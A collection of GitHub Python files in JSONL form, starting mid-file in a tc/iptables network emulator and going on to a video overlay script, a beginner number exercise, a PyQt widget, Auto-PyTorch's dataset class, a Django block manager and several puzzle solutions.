{params[\"dist\"]}',\n loss_cmd,\n '' if params[\"rate\"] == '' else f'rate {params[\"rate\"]}kbit'\n ]\n subprocess.run(' '.join(cmd), shell=True)\n\ndef init_iptables():\n my_ip = get_my_ip()\n host_ip = re.sub(r'\\d+$', '1', my_ip)\n subprocess.run(\n f'iptables -t nat -A PREROUTING -p tcp --dport 90 -j RETURN',\n shell=True\n )\n subprocess.run(\n f'iptables -t nat -A PREROUTING -d {my_ip}/32 -j DNAT --to-destination {host_ip}',\n shell=True\n )\n subprocess.run(\n f'iptables -t nat -A POSTROUTING -s {host_ip}/32 -j SNAT --to-source {my_ip}',\n shell=True\n )","repo_name":"m2-farzan/Fisne","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37383378650","text":"# get_overlay should get the overlay for the community \n\ndef get_overlay(revolution_id):\n pass\n\nfrom moviepy.editor import VideoFileClip, ImageClip, CompositeVideoClip, clips_array\nfrom PIL import Image\nimport os \nfrom moviepy.video.fx.all import resize\nfrom scipy.ndimage.filters import gaussian_filter\nimport numpy as np\n\ndef gaussian_blur(image, sigma):\n \"\"\"Applies Gaussian blur to an image.\"\"\"\n blurred = gaussian_filter(image.astype(float), sigma=(sigma, sigma, 0))\n return np.array(blurred, dtype=np.uint8)\n\ndef add_overlay(clip_path, output_path, overlay_path):\n # Load the overlay image with Pillow to get its size\n overlay_image = Image.open(overlay_path)\n overlay_width, overlay_height = overlay_image.size\n\n # Load the video clip\n clip = VideoFileClip(clip_path)\n\n # Calculate the ratio for resizing the video\n ratio = min(overlay_width / clip.w, overlay_height / clip.h)\n\n # Resize the video to fit within the overlay\n resized_clip = clip.fx(resize, ratio)\n\n low_quality_clip = clip.fx(resize, 0.5) \n\n # Create a blurred background and resize to fit the overlay\n blur_clip = low_quality_clip.fl_image(lambda image: gaussian_blur(image, sigma=10))\n blur_clip = blur_clip.fx(resize, height=overlay_height)\n\n\n\n resized_clip = resized_clip.set_position('center')\n\n composed_clip = CompositeVideoClip([blur_clip, resized_clip], size=(overlay_width, overlay_height))\n\n # Create an ImageClip from the overlay\n overlay_clip = ImageClip(overlay_path, duration=composed_clip.duration)\n\n # Overlay the image on the video clip\n final_clip = CompositeVideoClip([composed_clip, overlay_clip])\n\n # Write the final clip to a file\n final_clip.write_videofile(output_path)\n\ndef add_overlay_to_many(input_dir, output_dir, overlay_path):\n # Get a list of all files in the directory\n files = os.listdir(input_dir)\n \n # Filter out non-video files\n video_files = [f for f in files if f.endswith(('.mp4', '.flv', '.mkv', '.webm', '.avi'))]\n \n for video_file in video_files:\n add_overlay(os.path.join(input_dir, video_file), os.path.join(output_dir, video_file), overlay_path)\n\ninput_directory = \"./output/extracted_action\"\noutput_directory = \"./output/overlayed\"\noverlay_path = \"./assets/overlay.png\"\n\n# Usage\nif __name__ == \"__main__\":\n add_overlay_to_many(input_directory, output_directory, overlay_path)\n","repo_name":"collectivexyz/collab-generator","sub_path":"add_overlay.py","file_name":"add_overlay.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8777350927","text":"def fact(n):\r\n if n==1:\r\n return n\r\n else:\r\n return n*fact(n-1)\r\nsum,temp=0,0\r\nn=int(input())\r\ntemp=n\r\nwhile n!=0:\r\n r=n%10\r\n sum=sum+fact(r)\r\n n=n//10\r\n if sum==temp:\r\n print(\"strong number\")\r\n else:\r\n print(\"not a strong number\")","repo_name":"YAMINISAIMARISETTI/python-crt","sub_path":"exp73.py","file_name":"exp73.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15831553199","text":"from PyQt5 import Qt\r\nfrom Code.Widgets.BuiltInWidgets import *\r\nimport datetime\r\n\r\n\r\n# create a widget that inclueds clickable widgets which function as shorcuts keys\r\nclass ShortCutButtons(CreateLayoutWidget):\r\n def __init__(self, layout=None):\r\n # adding the raw of the short cuts buttons\r\n CreateLayoutWidget.__init__(self, None, 'ShortCutsLayoutWidget', layout=layout)\r\n layout = CreateHorizontalLayout(self, 0, \"ShortCutsLayout\")\r\n self.setLayout(layout)\r\n\r\n self.ButtonsObjectsList = []\r\n for text in ['Today', 'Tomorrow', 'Next Week', 'Next Weekend']:\r\n label = CreateLabel(None, 8, text, f'{text} label', Layout=self.layout())\r\n label.setAlignment(Qt.Qt.AlignCenter)\r\n label.setStyleSheet(\r\n \"QFrame {border-radius: 10px; border: 2px solid; padding-right: 5px; padding-left: 5px;}\")\r\n #label.clicked.connect(print(text))\r\n self.ButtonsObjectsList.append(label)\r\n\r\n self.GetTomorrowDate()\r\n self.GetNextWeekDate()\r\n self.GetNextWeekEndDate()\r\n\r\n def GetTomorrowDate(self):\r\n date = datetime.date.today() + datetime.timedelta(1)\r\n date_tuple = date.timetuple()[:3]\r\n print(date_tuple)\r\n #return date_tuple\r\n\r\n def GetNextWeekDate(self):\r\n date = datetime.date.today() + datetime.timedelta(7)\r\n date_tuple = date.timetuple()[:3]\r\n print(date_tuple)\r\n # return date_tuple\r\n\r\n def GetNextWeekEndDate(self):\r\n # going throu the week to find the neext time there is a friday\r\n for d in range(8):\r\n date = datetime.date.today() + datetime.timedelta(d)\r\n print(date.strftime(\"%w\"))\r\n if date.strftime(\"%w\") == \"5\":\r\n print(date.timetuple()[:3])\r\n\r\n\r\n\r\n","repo_name":"EranXH/Task-Manager","sub_path":"Task Manager Client/Code/Widgets/DataTime/ShortCutButtons.py","file_name":"ShortCutButtons.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"271035691","text":"import os\nimport uuid\nfrom abc import ABCMeta\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union, cast\n\nimport numpy as np\n\nfrom scipy.sparse import issparse\n\nfrom sklearn.utils.multiclass import type_of_target\n\nfrom torch.utils.data import Dataset, Subset\n\nimport torchvision\n\nfrom autoPyTorch.constants import CLASSIFICATION_OUTPUTS, STRING_TO_OUTPUT_TYPES\nfrom autoPyTorch.datasets.resampling_strategy import (\n CrossValFunc,\n CrossValFuncs,\n CrossValTypes,\n DEFAULT_RESAMPLING_PARAMETERS,\n HoldOutFunc,\n HoldOutFuncs,\n HoldoutValTypes,\n NoResamplingFunc,\n NoResamplingFuncs,\n NoResamplingStrategyTypes,\n ResamplingStrategies\n)\nfrom autoPyTorch.utils.common import FitRequirement, ispandas\n\nBaseDatasetInputType = Union[Tuple[np.ndarray, np.ndarray], Dataset]\nBaseDatasetPropertiesType = Union[int, float, str, List, bool, Tuple]\n\n\ndef check_valid_data(data: Any) -> None:\n if not all(hasattr(data, attr) for attr in ['__getitem__', '__len__']):\n raise ValueError(\n 'The specified Data for Dataset must have both __getitem__ and __len__ attribute.')\n\n\ndef type_check(train_tensors: BaseDatasetInputType,\n val_tensors: Optional[BaseDatasetInputType] = None) -> None:\n \"\"\"To avoid unexpected behavior, we use loops over indices.\"\"\"\n for i in range(len(train_tensors)):\n check_valid_data(train_tensors[i])\n if val_tensors is not None:\n for i in range(len(val_tensors)):\n check_valid_data(val_tensors[i])\n\n\ndef _get_output_properties(train_tensors: BaseDatasetInputType) -> Tuple[int, str]:\n \"\"\"\n Return the dimension of output given a target_labels and output_type.\n\n Args:\n train_tensors (BaseDatasetInputType):\n Training data.\n\n Returns:\n output_dim (int):\n The dimension of outputs.\n output_type (str):\n The output type according to sklearn specification.\n \"\"\"\n if isinstance(train_tensors, Dataset):\n target_labels = np.array([sample[-1] for sample in train_tensors])\n else:\n target_labels = np.array(train_tensors[1])\n\n output_type: str = type_of_target(target_labels)\n if STRING_TO_OUTPUT_TYPES[output_type] in CLASSIFICATION_OUTPUTS:\n output_dim = len(np.unique(target_labels))\n elif target_labels.ndim > 1:\n output_dim = target_labels.shape[-1]\n else:\n output_dim = 1\n\n return output_dim, output_type\n\n\nclass TransformSubset(Subset):\n \"\"\"Wrapper of BaseDataset for splitted datasets\n\n Since the BaseDataset contains all the data points (train/val/test),\n we require different transformation for each data point.\n This class helps to take the subset of the dataset\n with either training or validation transformation.\n The TransformSubset allows to add train flags\n while indexing the main dataset towards this goal.\n\n Attributes:\n dataset (BaseDataset/Dataset): Dataset to sample the subset\n indices names (Sequence[int]): Indices to sample from the dataset\n train (bool): If we apply train or validation transformation\n\n \"\"\"\n\n def __init__(self, dataset: Dataset, indices: Sequence[int], train: bool) -> None:\n self.dataset = dataset\n self.indices = indices\n self.train = train\n\n def __getitem__(self, idx: int) -> np.ndarray:\n return self.dataset.__getitem__(self.indices[idx], self.train)\n\n\nclass BaseDataset(Dataset, metaclass=ABCMeta):\n def __init__(\n self,\n train_tensors: BaseDatasetInputType,\n dataset_name: Optional[str] = None,\n val_tensors: Optional[BaseDatasetInputType] = None,\n test_tensors: Optional[BaseDatasetInputType] = None,\n resampling_strategy: ResamplingStrategies = HoldoutValTypes.holdout_validation,\n resampling_strategy_args: Optional[Dict[str, Any]] = None,\n shuffle: Optional[bool] = True,\n seed: Optional[int] = 42,\n train_transforms: Optional[torchvision.transforms.Compose] = None,\n val_transforms: Optional[torchvision.transforms.Compose] = None,\n ):\n \"\"\"\n Base class for datasets used in AutoPyTorch\n Args:\n train_tensors (A tuple of objects that have a __len__ and a __getitem__ attribute):\n training data\n dataset_name (str): name of the dataset, used as experiment name.\n val_tensors (An optional tuple of objects that have a __len__ and a __getitem__ attribute):\n validation data\n test_tensors (An optional tuple of objects that have a __len__ and a __getitem__ attribute):\n test data\n resampling_strategy (RESAMPLING_STRATEGIES: default=HoldoutValTypes.holdout_validation):\n strategy to split the training data.\n resampling_strategy_args (Optional[Dict[str, Any]]): arguments\n required for the chosen resampling strategy. If None, uses\n the default values provided in DEFAULT_RESAMPLING_PARAMETERS\n in ```datasets/resampling_strategy.py```.\n shuffle: Whether to shuffle the data before performing splits\n seed (int: default=1): seed to be used for reproducibility.\n train_transforms (Optional[torchvision.transforms.Compose]):\n Additional Transforms to be applied to the training data\n val_transforms (Optional[torchvision.transforms.Compose]):\n Additional Transforms to be applied to the validation/test data\n \"\"\"\n\n if dataset_name is None:\n self.dataset_name = str(uuid.uuid1(clock_seq=os.getpid()))\n else:\n self.dataset_name = dataset_name\n\n if not hasattr(train_tensors[0], 'shape'):\n type_check(train_tensors, val_tensors)\n self.train_tensors, self.val_tensors, self.test_tensors = train_tensors, val_tensors, test_tensors\n self.cross_validators: Dict[str, CrossValFunc] = {}\n self.holdout_validators: Dict[str, HoldOutFunc] = {}\n self.no_resampling_validators: Dict[str, NoResamplingFunc] = {}\n self.random_state = np.random.RandomState(seed=seed)\n self.shuffle = shuffle\n self.resampling_strategy = resampling_strategy\n self.resampling_strategy_args = resampling_strategy_args\n self.task_type: Optional[str] = None\n self.issparse: bool = issparse(self.train_tensors[0])\n self.input_shape: Tuple[int] = self.train_tensors[0].shape[1:]\n if len(self.train_tensors) == 2 and self.train_tensors[1] is not None:\n self.output_shape, self.output_type = _get_output_properties(self.train_tensors)\n\n # TODO: Look for a criteria to define small enough to preprocess\n self.is_small_preprocess = True\n\n # Make sure cross validation splits are created once\n self.cross_validators = CrossValFuncs.get_cross_validators(*CrossValTypes)\n self.holdout_validators = HoldOutFuncs.get_holdout_validators(*HoldoutValTypes)\n self.no_resampling_validators = NoResamplingFuncs.get_no_resampling_validators(*NoResamplingStrategyTypes)\n\n self.splits = self.get_splits_from_resampling_strategy()\n\n # We also need to be able to transform the data, be it for pre-processing\n # or for augmentation\n self.train_transform = train_transforms\n self.val_transform = val_transforms\n\n def update_transform(self, transform: Optional[torchvision.transforms.Compose],\n train: bool = True) -> 'BaseDataset':\n \"\"\"\n During the pipeline execution, the pipeline object might propose transformations\n as a product of the current pipeline configuration being tested.\n\n This utility allows to return self with the updated transformation, so that\n a dataloader can yield this dataset with the desired transformations\n\n Args:\n transform (torchvision.transforms.Compose):\n The transformations proposed by the current pipeline\n train (bool):\n Whether to update the train or validation transform\n\n Returns:\n self: A copy of the update pipeline\n \"\"\"\n if train:\n self.train_transform = transform\n else:\n self.val_transform = transform\n return self\n\n def __getitem__(self, index: int, train: bool = True) -> Tuple[np.ndarray, ...]:\n \"\"\"\n The base dataset uses a Subset of the data. Nevertheless, the base dataset expects\n both validation and test data to be present in the same dataset, which motivates\n the need to dynamically give train/test data with the __getitem__ command.\n\n This method yields a datapoint of the whole data (after a Subset has selected a given\n item, based on the resampling strategy) and applies a train/testing transformation, if any.\n\n Args:\n index (int): what element to yield from all the train/test tensors\n train (bool): Whether to apply a train or test transformation, if any\n\n Returns:\n A transformed single point prediction\n \"\"\"\n\n X = self.train_tensors[0].iloc[[index]] if ispandas(self.train_tensors[0]) \\\n else self.train_tensors[0][index]\n\n if self.train_transform is not None and train:\n X = self.train_transform(X)\n elif self.val_transform is not None and not train:\n X = self.val_transform(X)\n\n # In case of prediction, the targets are not provided\n Y = self.train_tensors[1][index] if self.train_tensors[1] is not None else None\n\n return X, Y\n\n def __len__(self) -> int:\n return int(self.train_tensors[0].shape[0])\n\n def _get_indices(self) -> np.ndarray:\n return self.random_state.permutation(len(self)) if self.shuffle else np.arange(len(self))\n\n def get_splits_from_resampling_strategy(self) -> List[Tuple[List[int], Optional[List[int]]]]:\n \"\"\"\n Creates a set of splits based on a resampling strategy provided\n\n Returns\n (List[Tuple[List[int], List[int]]]): splits in the [train_indices, val_indices] format\n \"\"\"\n splits = []\n if isinstance(self.resampling_strategy, HoldoutValTypes):\n val_share = DEFAULT_RESAMPLING_PARAMETERS[self.resampling_strategy].get(\n 'val_share', None)\n if self.resampling_strategy_args is not None:\n val_share = self.resampling_strategy_args.get('val_share', val_share)\n splits.append(\n self.create_holdout_val_split(\n holdout_val_type=self.resampling_strategy,\n val_share=val_share,\n )\n )\n elif isinstance(self.resampling_strategy, CrossValTypes):\n num_splits = DEFAULT_RESAMPLING_PARAMETERS[self.resampling_strategy].get(\n 'num_splits', None)\n if self.resampling_strategy_args is not None:\n num_splits = self.resampling_strategy_args.get('num_splits', num_splits)\n # Create the split if it was not created before\n splits.extend(\n self.create_cross_val_splits(\n cross_val_type=self.resampling_strategy,\n num_splits=cast(int, num_splits),\n )\n )\n elif isinstance(self.resampling_strategy, NoResamplingStrategyTypes):\n splits.append((self.no_resampling_validators[self.resampling_strategy.name](self.random_state,\n self._get_indices()), None))\n else:\n raise ValueError(f\"Unsupported resampling strategy={self.resampling_strategy}\")\n return splits\n\n def create_cross_val_splits(\n self,\n cross_val_type: CrossValTypes,\n num_splits: int\n ) -> List[Tuple[Union[List[int], np.ndarray], Union[List[int], np.ndarray]]]:\n \"\"\"\n This function creates the cross validation split for the given task.\n\n It is done once per dataset to have comparable results among pipelines\n Args:\n cross_val_type (CrossValTypes):\n num_splits (int): number of splits to be created\n\n Returns:\n (List[Tuple[Union[List[int], np.ndarray], Union[List[int], np.ndarray]]]):\n list containing 'num_splits' splits.\n \"\"\"\n # Create just the split once\n # This is gonna be called multiple times, because the current dataset\n # is being used for multiple pipelines. That is, to be efficient with memory\n # we dump the dataset to memory and read it on a need basis. So this function\n # should be robust against multiple calls, and it does so by remembering the splits\n if not isinstance(cross_val_type, CrossValTypes):\n raise NotImplementedError(f'The selected `cross_val_type` \"{cross_val_type}\" is not implemented.')\n kwargs = {}\n if cross_val_type.is_stratified():\n # we need additional information about the data for stratification\n kwargs[\"stratify\"] = self.train_tensors[-1]\n splits = self.cross_validators[cross_val_type.name](\n self.random_state, num_splits, self._get_indices(), **kwargs)\n return splits\n\n def create_holdout_val_split(\n self,\n holdout_val_type: HoldoutValTypes,\n val_share: float,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n This function creates the holdout split for the given task.\n\n It is done once per dataset to have comparable results among pipelines\n Args:\n holdout_val_type (HoldoutValTypes):\n val_share (float): share of the validation data\n\n Returns:\n (Tuple[np.ndarray, np.ndarray]): Tuple containing (train_indices, val_indices)\n \"\"\"\n if holdout_val_type is None:\n raise ValueError(\n '`val_share` specified, but `holdout_val_type` not specified.'\n )\n if self.val_tensors is not None:\n raise ValueError(\n '`val_share` specified, but the Dataset was a given a pre-defined split at initialization already.')\n if val_share < 0 or val_share > 1:\n raise ValueError(f\"`val_share` must be between 0 and 1, got {val_share}.\")\n if not isinstance(holdout_val_type, HoldoutValTypes):\n raise NotImplementedError(f'The specified `holdout_val_type` \"{holdout_val_type}\" is not supported.')\n kwargs = {}\n if holdout_val_type.is_stratified():\n # we need additional information about the data for stratification\n kwargs[\"stratify\"] = self.train_tensors[-1]\n train, val = self.holdout_validators[holdout_val_type.name](\n self.random_state, val_share, self._get_indices(), **kwargs)\n return train, val\n\n def get_dataset(self, split_id: int, train: bool) -> Dataset:\n \"\"\"\n The above split methods employ the Subset to internally subsample the whole dataset.\n\n During training, we need access to one of those splits. This is a handy function\n to provide training data to fit a pipeline\n\n Args:\n split_id (int): which split id to get from the splits\n train (bool): whether the dataset is required for training or evaluating.\n\n Returns:\n Dataset: the reduced dataset to be used for testing\n \"\"\"\n # Subset creates a dataset. Splits is a (train_indices, test_indices) tuple\n if split_id >= len(self.splits): # old version: split_id > len(self.splits)\n raise IndexError(f\"self.splits index out of range, got split_id={split_id}\"\n f\" (>= num_splits={len(self.splits)})\")\n indices = self.splits[split_id][int(not train)] # 0: for training, 1: for evaluation\n if indices is None:\n raise ValueError(\"Specified fold (or subset) does not exist\")\n\n return TransformSubset(self, indices, train=train)\n\n def replace_data(self, X_train: BaseDatasetInputType,\n X_test: Optional[BaseDatasetInputType]) -> 'BaseDataset':\n \"\"\"\n To speed up the training of small dataset, early pre-processing of the data\n can be made on the fly by the pipeline.\n\n In this case, we replace the original train/test tensors by this pre-processed version\n\n Args:\n X_train (np.ndarray): the pre-processed (imputation/encoding/...) train data\n X_test (np.ndarray): the pre-processed (imputation/encoding/...) test data\n\n Returns:\n self\n \"\"\"\n self.train_tensors = (X_train, self.train_tensors[1])\n if X_test is not None and self.test_tensors is not None:\n self.test_tensors = (X_test, self.test_tensors[1])\n return self\n\n def get_dataset_properties(\n self, dataset_requirements: List[FitRequirement]\n ) -> Dict[str, BaseDatasetPropertiesType]:\n \"\"\"\n Gets the dataset properties required in the fit dictionary.\n This depends on the components that are active in the\n pipeline and returns the properties they need about the dataset.\n Information of the required properties of each component\n can be found in their documentation.\n Args:\n dataset_requirements (List[FitRequirement]): List of\n fit requirements that the dataset properties must\n contain. This is created using the `get_dataset_requirements\n function in\n `\n\n Returns:\n dataset_properties (Dict[str, BaseDatasetPropertiesType]):\n Dict of the dataset properties.\n \"\"\"\n dataset_properties = dict()\n for dataset_requirement in dataset_requirements:\n dataset_properties[dataset_requirement.name] = getattr(self, dataset_requirement.name)\n\n # Add the required dataset info to dataset properties as\n # they might not be a dataset requirement in the pipeline\n dataset_properties.update(self.get_required_dataset_info())\n return dataset_properties\n\n def get_required_dataset_info(self) -> Dict[str, BaseDatasetPropertiesType]:\n \"\"\"\n Returns a dictionary containing required dataset\n properties to instantiate a pipeline.\n \"\"\"\n info: Dict[str, BaseDatasetPropertiesType] = {'output_type': self.output_type,\n 'issparse': self.issparse}\n return info\n","repo_name":"automl/Auto-PyTorch","sub_path":"autoPyTorch/datasets/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":18711,"program_lang":"python","lang":"en","doc_type":"code","stars":2173,"dataset":"github-code","pt":"78"} +{"seq_id":"4325748071","text":"'''\nCreated on 10/25/20\n@author: Susmitha Shailesh\nPledge: I pledge my honor to abide by the Stevens Honor System.\nSSW555 - Sprint 2\n'''\n\nfrom Gedcom import Gedcom\n\ndef makeReturnString(livingSingle):\n\n\tlivingSingle.sort\n\n\tif(len(livingSingle) == 0):\n\t\treturn \"There are no living single individuals.\" \n\telse: \n\t\tret = \"The following individuals are living and single:\"\n\n\t\tfor i in livingSingle:\n\t\t\tret = ret + \" \" + i + \",\"\n\n\t\tif(ret[len(ret)-1] == \",\"):\n\t\t\tret = ret[0:len(ret)-1]\n\n\t\treturn(ret)\n\n\n\ndef listLivingSingle(gedcom_name):\n\n\tgedcom = Gedcom(gedcom_name)\n\n\tinds = gedcom.individuals\n\n\tlivingSingle = []\n\n\tfor ind in inds:\n\t\tif ind.isSpouseToFamId == \"\" and ind.death == \"\":\n\t\t\tlivingSingle.append(ind.name)\n\n\tret = makeReturnString(livingSingle)\n\treturn(ret)","repo_name":"ming1in/gedcom-parser","sub_path":"src/us31.py","file_name":"us31.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24077740060","text":"from Simuann import CxGCoverage\nimport random\n\nt_minutes = 0.05\ntest_cxgs = {\n 'the--NOUN--was--ADV' : (1, 5),\n 'the--NOUN--was' : (1, 4),\n 'NOUN--AUX--ADV' : (2, 5),\n 'AUX--so--ADJ' : (3, 6)\n}\n\ncxg_names = list(test_cxgs)\n\n# Initialize states\ninit_state = [0] * len(cxg_names)\nfor _ in range(random.randint(1, len(cxg_names))):\n init_state[random.randint(0, len(cxg_names)-1)] = 1\n\n# Pack inputs\nstarts, ends, patterns = [], [], []\nfor cxg in test_cxgs:\n starts.append(test_cxgs[cxg][0])\n ends.append(test_cxgs[cxg][1])\n patterns.append(cxg)\n\n# Initialize CxGCoverage\ncp = CxGCoverage(init_state, patterns, starts, ends, vis=True)\ncp.set_schedule(cp.auto(minutes=t_minutes))\nstate, energy = cp.anneal()\nprint()\nprint('>> Results:')\nfor ids in range(len(state)):\n if state[ids] == 1:\n cxg = list(test_cxgs)[ids]\n print('CXG : {}, ({}, {})'.format(cxg, test_cxgs[cxg][0], test_cxgs[cxg][1]))\n\n# Output:\n# Temperature Energy Accept Improve Elapsed Remaining\n# 0.10000 0.66 0.00% 0.00% 0:00:01 0:00:00\n# Temperature Energy Accept Improve Elapsed Remaining\n# 0.10000 0.66 0.07% 0.04% 0:00:03 0:00:00\n# >> Results:\n# CXG : the--NOUN--was, (1, 4)\n# CXG : AUX--so--ADJ, (3, 6)","repo_name":"xlxwalex/HyCxG","sub_path":"tutorials/02_coverage_solver_tutorial.py","file_name":"02_coverage_solver_tutorial.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"27697309913","text":"import logging\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django.core.exceptions import ValidationError\n\nfrom speedy.core.base import cache_manager\nfrom speedy.core.base.cache_manager import DEFAULT_TIMEOUT\nfrom speedy.core.base.managers import BaseManager\nfrom speedy.core.accounts.models import Entity, User\n\nlogger = logging.getLogger(__name__)\n\nCACHE_TYPES = {\n 'blocked': 'speedy-bo-%s',\n 'blocking': 'speedy-bd-%s',\n}\n\nBUST_CACHES = {\n 'blocked': ['blocked'],\n 'blocking': ['blocking'],\n}\n\n\ndef cache_key(type, entity_pk):\n \"\"\"\n Build the cache key for a particular type of cached value.\n \"\"\"\n return CACHE_TYPES[type] % entity_pk\n\n\ndef bust_cache(type, entity_pk, version=None):\n \"\"\"\n Bust the cache for a given type, can bust multiple caches.\n \"\"\"\n bust_keys = BUST_CACHES[type]\n keys = [CACHE_TYPES[k] % entity_pk for k in bust_keys]\n cache_manager.cache_delete_many(keys=keys, version=version)\n\n\nclass BlockManager(BaseManager):\n def _update_caches(self, blocker, blocked):\n \"\"\"\n Update caches after block or unblock.\n \"\"\"\n bust_cache(type='blocked', entity_pk=blocker.pk)\n bust_cache(type='blocked', entity_pk=blocker.pk, version=2)\n bust_cache(type='blocking', entity_pk=blocked.pk)\n bust_cache(type='blocking', entity_pk=blocked.pk, version=2)\n if ('blocked_entities_ids' in blocker.__dict__):\n del blocker.blocked_entities_ids\n if ('blocking_entities_ids' in blocked.__dict__):\n del blocked.blocking_entities_ids\n\n def block(self, blocker, blocked):\n if (blocker == blocked):\n raise ValidationError(_(\"Users cannot block themselves.\"))\n\n block, created = self.get_or_create(blocker=blocker, blocked=blocked)\n self._update_caches(blocker=blocker, blocked=blocked)\n return block\n\n def unblock(self, blocker, blocked):\n for block in self.filter(blocker__pk=blocker.pk, blocked__pk=blocked.pk):\n block.delete()\n self._update_caches(blocker=blocker, blocked=blocked)\n\n def has_blocked(self, blocker, blocked):\n if ((not (isinstance(blocker, Entity))) or (not (isinstance(blocked, Entity)))):\n return False\n if ('blocked_entities_ids' in blocker.__dict__):\n return (blocked.pk in blocker.blocked_entities_ids)\n if ('blocking_entities_ids' in blocked.__dict__):\n return (blocker.pk in blocked.blocking_entities_ids)\n return (blocked.pk in blocker.blocked_entities_ids)\n\n def there_is_block(self, entity_1, entity_2):\n return self.has_blocked(blocker=entity_1, blocked=entity_2) or self.has_blocked(blocker=entity_2, blocked=entity_1)\n\n def get_blocked_entities_ids(self, blocker):\n blocked_key = cache_key(type='blocked', entity_pk=blocker.pk)\n try:\n blocked_entities_ids = cache_manager.cache_get(key=blocked_key, version=2, sliding_timeout=DEFAULT_TIMEOUT)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocked_entities_ids:cache_manager.cache_get raised an exception, blocker={blocker}, Exception={e}\".format(\n blocker=blocker,\n e=str(e),\n ))\n blocked_entities_ids = None\n if (blocked_entities_ids is None):\n blocked_entities_ids = list(self.filter(blocker=blocker).values_list('blocked_id', flat=True))\n try:\n cache_manager.cache_set(key=blocked_key, value=blocked_entities_ids, version=2)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocked_entities_ids:cache_manager.cache_set raised an exception, blocker={blocker}, Exception={e}\".format(\n blocker=blocker,\n e=str(e),\n ))\n return blocked_entities_ids\n\n def get_blocking_entities_ids(self, blocked):\n blocking_key = cache_key(type='blocking', entity_pk=blocked.pk)\n try:\n blocking_entities_ids = cache_manager.cache_get(key=blocking_key, version=2, sliding_timeout=DEFAULT_TIMEOUT)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocking_entities_ids:cache_manager.cache_get raised an exception, blocked={blocked}, Exception={e}\".format(\n blocked=blocked,\n e=str(e),\n ))\n blocking_entities_ids = None\n if (blocking_entities_ids is None):\n blocking_entities_ids = list(self.filter(blocked=blocked).values_list('blocker_id', flat=True))\n try:\n cache_manager.cache_set(key=blocking_key, value=blocking_entities_ids, version=2)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocking_entities_ids:cache_manager.cache_set raised an exception, blocked={blocked}, Exception={e}\".format(\n blocked=blocked,\n e=str(e),\n ))\n return blocking_entities_ids\n\n def get_blocked_list_to_queryset(self, blocker):\n from speedy.net.accounts.models import SiteProfile as SpeedyNetSiteProfile\n from speedy.match.accounts.models import SiteProfile as SpeedyMatchSiteProfile\n\n # Include also inactive users.\n blocked_users = User.objects.filter(pk__in=self.filter(blocker=blocker).values_list('blocked_id', flat=True))\n\n return self.filter(blocker=blocker).filter(blocked__in=blocked_users).prefetch_related(\"blocked\", \"blocked__user\", \"blocked__user__{}\".format(SpeedyNetSiteProfile.RELATED_NAME), \"blocked__user__{}\".format(SpeedyMatchSiteProfile.RELATED_NAME), \"blocked__user__photo\").order_by('-date_created')\n\n\n","repo_name":"speedy-net/speedy-net","sub_path":"speedy/core/blocks/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"14431050424","text":"def parse_inputs_header(lines):\n valid_ranges = {}\n for line in lines[:lines.index('your ticket:') - 1]:\n name, ranges = line.split(': ')\n range_1, range_2 = ranges.split(' or ')\n range_1 = range_1.split('-')\n range_2 = range_2.split('-')\n valid_ranges[name] = set()\n for n in range(int(range_1[0]), int(range_1[1]) + 1):\n valid_ranges[name].add(n)\n for n in range(int(range_2[0]), int(range_2[1]) + 1):\n valid_ranges[name].add(n)\n my_ticket = [int(n)\n for n in lines[lines.index('your ticket:') + 1].split(',')]\n return valid_ranges, my_ticket\n\n\ndef scanning_errors(lines):\n valid_ranges, _ = parse_inputs_header(lines)\n valid_set = {n for vr in valid_ranges.values() for n in vr}\n error_sum = 0\n for line in lines[lines.index('nearby tickets:') + 1:]:\n for tn in [int(n) for n in line.split(',')]:\n if tn not in valid_set:\n error_sum += tn\n return error_sum\n\n\ndef deduce(lines):\n valid_ranges, my_ticket = parse_inputs_header(lines)\n valid_set = {n for vr in valid_ranges.values() for n in vr}\n\n possible_fields = [set(valid_ranges) for _ in range(len(my_ticket))]\n for line in lines[lines.index('nearby tickets:') + 1:]:\n nums = [int(n) for n in line.split(',')]\n if any(n not in valid_set for n in nums):\n continue\n for i, n in enumerate(nums):\n keep = {f for f in possible_fields[i] if n in valid_ranges[f]}\n possible_fields[i] = possible_fields[i].intersection(keep)\n\n field_to_index = {}\n while len(field_to_index) < len(my_ticket):\n for i, pfs in enumerate(possible_fields):\n if len(pfs) == 1:\n field_to_index[pfs.pop()] = i\n break\n possible_fields = [pf.difference(set(field_to_index))\n for pf in possible_fields]\n\n mul = 1\n for field, index in field_to_index.items():\n mul *= my_ticket[index] if field.startswith('departure') else 1\n return mul\n\n\nif __name__ == '__main__':\n with open('src/day16.txt') as fp:\n inputs = fp.read()\n print(scanning_errors(inputs.splitlines()))\n print(deduce(inputs.splitlines()))\n","repo_name":"lenafullmoon/AoC","sub_path":"2020/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33734818670","text":"# -*- coding: utf-8 -*-\n\nfrom peewee import *\n\ndb = 